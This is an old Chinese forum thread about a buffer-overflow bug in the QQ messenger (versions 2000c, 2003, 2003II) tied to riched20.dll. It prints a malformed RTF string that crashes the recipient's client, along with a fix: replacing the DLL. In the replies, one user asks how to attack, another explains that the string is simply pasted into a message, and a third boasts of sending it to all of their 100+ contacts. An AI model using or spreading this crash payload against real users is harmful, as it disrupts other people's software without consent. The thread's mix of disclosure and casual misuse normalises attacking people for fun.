QQ BUG

PXE2

还记得上次QQ2000c08xx以前版本受到的那个因为riched20.dll造成的缓冲区溢出漏洞
吗?

tencent真是不长记性

这次受影响的版本为QQ2000c,QQ2003,QQ2003II

使用如下代码就可以crash掉对方,还有自己(如果你打开消息管理器看你自己发的消息
的话)


{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fc
harset134
'cb'ce'cc'e5;}} \fs1800000000000000000000000000000


补救方法,获取最新的riched20.dll(可以从office最新的组建里copy过来),也可以去木
子工作室下载修改过的riched20.dll

下载地址
http://www.muzi-studio.com/file/pafiledb.php?action=file&id=43

elovebug

请问具体如何进行攻击？

樱家冢

把上面的代码复制到给对方发送信息的框里面发送就可以了，这种东西知道就可以了，还是不要拿来实践得好。

elovebug

果然管用，我把那段代码给我QQ上的人一人发了一个，然后就下线了，第二天一上线，所有的好友发来同一句话“这是什么”
一百多条信息，看了半天才看完，累呀～